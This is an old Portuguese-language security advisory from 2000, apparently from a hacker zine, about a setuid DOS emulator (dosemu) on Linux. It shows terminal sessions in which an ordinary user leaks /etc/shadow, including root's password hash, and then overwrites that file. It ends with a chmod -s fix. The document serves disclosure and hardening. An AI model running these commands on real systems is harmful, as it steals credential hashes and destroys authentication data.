|
Como
tudo relacionado a MS eh uma merda, este emulador encontrado em
Leenoxs eh bugzado pra kraio e pode por seu sistema em risco c nao for
corrigido. Vou demosntrar como burlar o linux que estiver rodando este
emulador nas configuracoes originais e como corrigir o erro.
Antes de comecar a testar os modos ensinados aki em sua maqina, faca um
backup do /etc/shadow, pois iremos usa-lo para demonstrar a inseguranca
deste programa.
Neste 1o exemplo vou mostrar como qualquer usuario pode pegar
facilmente seu arquivo de senhas:
Script started on Thu Mar 2 00:17:48 2000
[struck@localhost ~]$ dos -F /etc/shadow
CPU speed set to 378/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
Error in /etc/shadow: (line 001) unrecognized command 'root:SAlNq/oiIe8ik:11018:0:99999:7:::'
Error in /etc/shadow: (line 002) unrecognized command 'bin:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 003) unrecognized command 'daemon:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 004) unrecognized command 'adm:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 005) unrecognized command 'lp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 006) unrecognized command 'sync:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 007) unrecognized command 'shutdown:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 008) unrecognized command 'halt:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 009) unrecognized command 'mail:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 010) unrecognized command 'news:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 011) unrecognized command 'uucp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 012) unrecognized command 'operator:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 013) unrecognized command 'games:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 014) unrecognized command 'gopher:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 015) unrecognized command 'ftp:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 016) unrecognized command 'nobody:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 017) unrecognized command 'postgres:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 018) unrecognized command 'struck:YAOj6uk867WrY:11018:0:99999:7:::'
18 error(s) detected while parsing the configuration-file
Error in (null): (line 019)
Your /etc/shadow script or /etc/dosemu.conf configuration file is obviously
an old style or a too simple one
Please read README.txt on how to upgrade
[struck@localhost
~]$ exit
Script done on Thu Mar 2 00:18:07 2000
O segundo exemplo agora mostra como eh facil apagar seu /etc/shadow
usando o dosemu.
Script started on Thu Mar 2 00:19:32 2000
[struck@localhost ~]$ dos -o /etc/shadow
CPU speed set to 378/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
Linux DOS emulator 0.98.1.0 Date: 98/09/12
(Blablablablablabla...)
C:\>exitemu
[struck@localhost ~]$ cat /etc/shadow
[00000330] debug flags:
[00003634] DOS termination requested
[00003636]
[struck@localhost ~]$ exit
Script done on Thu Mar 2 00:20:00 2000
Agora vamos passar um poko para a parte de security...
A Fixacaum mais segura para essas falhas eh retirar o setuid bit dos:
[root@localhost
/root]# whereis dos
dos: /usr/bin/dos /usr/man/man1/dos.1
[root@localhost /root]# chmod -s /usr/bin/dos
[root@localhost /root]#
Issu ae! Que a forca esteje com vcs!! |